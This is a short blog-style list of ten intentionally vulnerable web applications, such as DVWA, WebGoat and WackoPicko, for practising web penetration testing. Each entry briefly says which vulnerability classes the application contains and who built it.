10 vulnerable web applications to Hack
DVWA (Dam Vulnerable Web
Application) - this vulnerable PHP/MySQL web application is one of the famous
web applications used for or testing your skills in web penetration
testing and your knowledge in manual SQL Injection, XSS, Blind SQL Injection,
etc. DVWA is developed by Ryan Dewhurst a.k.a ethicalhack3r and is
part of RandomStorm OpenSource project.
Link: http://www.dvwa.co.uk
Mutillidae - is a free and open
source web application for website penetration testing and hacking which was
developed by Adrian “Irongeek” Crenshaw and Jeremy “webpwnized” Druin. It is
designed to be exploitable and vulnerable and ideal for practicing your Web Fu
skills like SQL injection, cross site scripting, HTML injection, Javascript
injection, clickjacking, local file inclusion, authentication bypass methods,
remote code execution and many more based on OWASP (Open Web Application
Security) Top 10 Web Vulnerabilties
SQLol - is a configurable SQL
injection testbed which allows you to exploit SQLI (Structured Query
Language Injection) flaws, but furthermore allows a large amount of control
over the manifestation of the flaw. This application was released at at
Austin Hackers Association meeting 0x3f by Daniel “unicornFurnace” Crowley
of Trustwave Holdings, Inc. – Spider Labs.
Hackxor - a web application hacking
game developed by albino. It is a game where players must locate and exploit
vulnerabilities to progress through the story wherein you play as a blackhat
hacker hired to track down another hacker by any means possible. It contains
scripts that are vulnerable to Cross Site Scripting(XSS), Cross Site Request
Forgery(CSRF), Structured Query Language Injection (SQLi), Remote Command
Injection(RCE), and many more. It’s also a web application running on Fedora
14.
The BodgeIt Store - is an open source and
vulnerable web application which is currently aimed at people who are new to
web penetration testing. It is easy to install and requires requires java
and a servlet engine, e.g. Tomcat. It includes vulnerabilities like Cross
Site Scripting, SQL injection, Hidden (but unprotected) content,
Debug Code, Cross Site Request Forgery, Insecure Object References,
and Application logic vulnerabilities.
Exploit KB /
exploit.co.il Vulnerable Web App - is one of the most famous
vulnerable web app designed as a learning platform to test various SQL
injection Techniques and it is a functional web site with a content management
system based on fckeditor. This web application is also included in the BackTrack Linux
5r2-PenTesting Edition lab.
WackoPicko - is a vulnerable web
application written by Adam Doupé. It contains known and common vulnerabilities
for you to harness your web penetration skills and knowledge like XSS
vulnerabilities, SQL injections, command-line injections, sessionID
vulnerabilities, file inclusions, parameters manipulation, Reflected XSS Behind
JavaScript, Logic Flaw, Reflected XSS Behind a Flash Form,
and Weak usernames or passwords. It was first used for the paper Why Johnny Can’t Pentest:
An Analysis of Black-box Web Vulnerability Scanners.
WebGoat -is an OWASP project and
a deliberately insecure J2EE web application designed to teach web
application security lessons and concepts. What’s cool about this web
application is that it lets users demonstrate their understanding of a security
issue by exploiting a real vulnerability in the application in each lesson.
OWASP Hackademic Challenges
Project - is another OWASP
Project that helps you test your knowledge on web application security. You can
use it to attack web applications in a realistic but also controlable and safe
environment. Currently, there are 10 web application security scenarios
available for you to hack.
XSSeducation – is a set of Cross
Site Scripting attack challenges for people just learning about XSS to people
who just want a good place to practice their already awesome skills. Various
realistic challenges have been included for practice and it is still under
development by AJ00200 but can already be dowloaded.
